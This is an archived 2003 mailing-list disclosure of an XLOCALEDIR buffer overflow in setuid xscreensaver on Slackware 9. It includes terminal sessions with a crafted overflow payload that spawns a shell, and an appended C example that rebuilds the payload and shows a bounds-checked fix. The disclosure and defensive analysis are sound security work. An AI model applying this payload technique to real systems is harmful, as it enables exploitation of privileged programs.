Message-ID: <20030923092442.34591.qmail@web14608.mail.yahoo.com>
From: b0fnet at yahoo.com (b0f)
Subject: xfree86 latest version BUG not vuln.

Hello,

To make it clear, I consider this to be a BUG in the code and not a vuln, but I still feel it should be fixed; any shell from suid binaries is not good.

While playing around with xterm and xscreensaver, which are both setuid on Slack 9, I came across a bug in the XLOCALEDIR env variable. There was a vuln back in January 2003 in the XLOCALEDIR env variable; an exploit for this can be viewed here:
 http://www.securiteam.com/exploits/5OP02209FO.html
This was fixed in XFree86 4.2.1; Slack 9 uses XFree86 4.3.0 by default. By using the same technique that this exploit uses but adding some extra args like '-font a' or '-t 0', this will still cause these binaries to overflow and overwrite eip. Here is an example of this.

toor@bob:/var/tmp/...$ ls -alF /usr/X11R6/bin/xscreensaver
-rwsr-xr-x    1 root     bin        210544 Mar  7 20:59 /usr/X11R6/bin/xscreensaver*
toor@bob:/var/tmp/...$ export XLOCALEDIR=`perl -e 'print "A"x4500'`
toor@bob:/var/tmp/...$ /usr/X11R6/bin/xscreensaver -t 0
xscreensaver: warning: $DISPLAY is not set: defaulting to ":0.0".
Segmentation fault
toor@bob:/var/tmp/...$ cat /etc/slackware-version
Slackware 9.0.0
toor@bob:/var/tmp/...$ uname -a
Linux bob 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
toor@bob:/var/tmp/...$

Or to execute a shell..

b0f@b0f:/tmp$ ./es
EggShell loaded into enviroment
b0f@b0f:/tmp$ export XLOCALEDIR=`perl -e 'print "A"x2052'``printf "\x64\xfa\xff\xbf"``perl -e 'print "B"x34'``perl -e 'print "A"x1992'`
b0f@b0f:/tmp$ /usr/X11R6/bin/xscreensaver -t 0
xscreensaver: couldn't get password of "b0f"
xscreensaver: warning: $DISPLAY is not set: defaulting to ":0.0".
sh-2.05a$ exit

xterm seems to only overflow when the effective and real uid are the same.

The way the buffer was built is kind of weird: it overwrites eip after a buffer of 2052, but it also needs more data after that for it to overflow; that's why I have another buffer of 2026 after the return address. So you control eip round about the middle of the buffer.

It seems that where the overflow happens is not privileged; there will be loads more apps that can be overflowed with XLOCALEDIR in this way. I can't see any way possible to get higher privs from it. XFree86.org knows about this bug but have not yet fixed it due to the fact they don't see it as a security problem. I haven't looked at the code to see what causes the overflow. Thought I would post this info to see if anyone can put it to any use. Would be grateful for any comments or suggestions.


Regards
b0f  (Alan M)
b0fnet@...oo.com
www.b0f.net
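Editor's note: the C below is an added illustration and is not part of b0f's post, nor XFree86 code (the poster says he has not looked at the XFree86 source, and neither does this example claim to reproduce it). It does two things the post describes in prose: it builds the XLOCALEDIR payload with the exact layout of the second session (2052 'A', the 4-byte little-endian return address 0xbffffa64, 34 'B', 1992 'A', so the return address sits at offset 2052 and the total is 4082 bytes), and it shows the kind of unchecked getenv() copy into a fixed stack buffer that such a layout defeats, next to a bounds-checked replacement that also refuses to honour the variable at all when the real and effective uids differ, which is the "no shell from suid binaries" point. The function names, the 2048-byte buffer size and the uid check are assumptions chosen for the illustration, not facts about xscreensaver or xterm.

```c
/* Added example, not from the post or from XFree86.  Builds the XLOCALEDIR
 * payload laid out as in the post, and contrasts an unchecked env copy
 * (hypothetical) with a bounds-checked, setuid-aware one.  Buffer size,
 * function names and the uid check are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Layout from the post's session: 2052 'A', 4-byte ret addr, 34 'B', 1992 'A'. */
#define PAD_BEFORE   2052
#define RET_ADDR     0xbffffa64u     /* the address used in the post */
#define PAD_NOPS     34
#define PAD_AFTER    1992
#define PAYLOAD_LEN  (PAD_BEFORE + 4 + PAD_NOPS + PAD_AFTER)   /* 4082 */

/* Fill buf (at least PAYLOAD_LEN + 1 bytes) with the payload; returns its length. */
size_t build_payload(char *buf)
{
    size_t n = 0;
    memset(buf + n, 'A', PAD_BEFORE); n += PAD_BEFORE;
    /* little-endian i386 return address, same bytes as printf "\x64\xfa\xff\xbf" */
    for (int i = 0; i < 4; i++)
        buf[n++] = (char)((RET_ADDR >> (8 * i)) & 0xff);
    memset(buf + n, 'B', PAD_NOPS);  n += PAD_NOPS;
    memset(buf + n, 'A', PAD_AFTER); n += PAD_AFTER;
    buf[n] = '\0';
    return n;
}

/* Offset at which the payload overwrites the saved return address. */
size_t ret_offset(void) { return PAD_BEFORE; }

/* Hypothetical unsafe pattern (assumption, not XFree86 code): the env value
 * is copied into a fixed stack buffer with no length check.  Fed the payload
 * above, strcpy runs past the buffer and over the saved return address.
 * Shown for contrast only; never call it with untrusted input. */
#define LOCALE_BUF 2048
int locale_copy_unsafe(const char *env)
{
    char path[LOCALE_BUF];
    if (env == NULL) return 0;
    strcpy(path, env);               /* overflows when strlen(env) >= LOCALE_BUF */
    return (int)strlen(path);
}

/* Checked replacement.  Ignores the variable entirely when the process runs
 * with elevated privileges (real uid != effective uid) and refuses values
 * that do not fit the buffer including the NUL.  Returns 1 if accepted. */
int locale_copy_checked(const char *env, uid_t ruid, uid_t euid,
                        char *out, size_t outlen)
{
    if (env == NULL || ruid != euid)
        return 0;                    /* setuid: do not trust the environment */
    const char *nul = memchr(env, '\0', outlen);
    if (nul == NULL)
        return 0;                    /* no terminator within outlen: too long */
    memcpy(out, env, (size_t)(nul - env) + 1);
    return 1;
}

int main(void)
{
    static char payload[PAYLOAD_LEN + 1];
    char out[LOCALE_BUF];
    size_t len = build_payload(payload);
    printf("payload length %zu, return address at offset %zu\n", len, ret_offset());
    printf("checked copy accepts payload: %d\n",
           locale_copy_checked(payload, getuid(), geteuid(), out, sizeof out));
    printf("checked copy accepts a normal path: %d\n",
           locale_copy_checked("/usr/X11R6/lib/X11/locale", getuid(), geteuid(),
                               out, sizeof out));
    return 0;
}
```

The checked version rejects the payload on length alone, and rejects any value at all, however short, once real and effective uids differ; that second rule is what removes the environment as an attack surface in a setuid binary even when a copy somewhere is later found to be unchecked.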



